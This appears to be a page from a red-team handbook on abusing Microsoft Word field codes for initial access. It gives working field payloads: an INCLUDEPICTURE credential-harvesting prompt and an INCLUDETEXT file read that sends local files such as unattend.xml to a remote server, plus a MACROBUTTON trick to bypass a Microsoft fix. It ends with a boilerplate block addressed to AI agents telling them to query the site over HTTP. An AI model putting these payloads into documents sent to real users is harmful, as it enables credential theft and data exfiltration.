# Field Abuse Fields are a feature in MS Word to create dynamic components which automate tasks like updating dates or page numbering. To insert a field, go to: insert > quickparts > fields. You will then have a whole list of field options to choose from. ## Credential Popup This uses the INCLUDEPICTURE field that points to a webserver that replies back with a basic HTTP basic authentication request. The URL of the INCLUDPICTURE is made dynamic with the USERNAME field. Note that word does not continue loading until the picture is loaded. ``` { INCLUDEPICTURE \d "http:///{ USERNAME \* MERGEFORMAT}"\* MERGEFORMATINET } ``` *Note: your server needs to reply back with basic HTTP authentication to capture credentials* ## Arbitrary File Read The INCLUDETEXT field will read a file and include its contents in the document. As you can see, this is self explanatory on how we will read the file. To send the file contents back to a server, the INCLUDEPICTURE field will be used. NOTE: (CVE-2002-1143) abused the INCLUDETEXT and INCLUDEPICTURE to arbitrarily read a file, but Microsoft fixed this by no longer automatically updating the INCLUDETEXT fields on various events. ``` { INCLUDEPICTURE { QUOTE "http://server" & { FILENAME \p } & { INCLUDETEXT "c:\read\file.txt" } } \d } ``` To bypass this mitigation, we will use the MACROBUTTON field with the option "updatefields" which will update file, and trigger the arbitrary file read. ``` { MACROBUTTON UpdateFields { INCLUDEPICTURE \d "http://picture.com/picture.png" \* MERGEFORMATIINET}{ INCLUDEPICTURE "http:///?{ INCLUDETEXT "c:\\windows\\panther\\unattend.xml" \c XML \* MERGEFORMAT}}" \d \* MERGEFORMAT }} ``` This will make a picture-button hybird in which if the user double clicks on this and accepts a prompt, the MACROBUTTON field will update all the fields and cause the said file to be posted to our web server. ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/initial-access/ms-office/field-abuse.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.